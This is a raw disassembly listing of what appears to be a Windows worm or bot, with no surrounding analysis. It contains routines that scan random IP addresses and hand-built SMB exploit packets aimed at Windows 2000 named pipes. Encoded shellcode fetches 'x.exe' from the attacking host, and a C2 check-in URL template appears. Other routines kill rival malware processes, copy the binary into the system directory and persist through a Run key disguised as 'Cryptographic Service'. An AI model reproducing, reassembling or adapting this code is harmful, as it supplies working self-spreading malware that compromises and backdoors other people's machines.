jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; Sleep
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; lstrcpyA
push offset byte_314242B8
call dword_31421084 ; lstrlenA
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; Sleep
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; Sleep
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; Sleep
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aIaimwmlpigzshv ; "iaimwmlpigzshvbp"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aIaimwmlpigzshv ; "iaimwmlpigzshvbp"
call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpiA
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
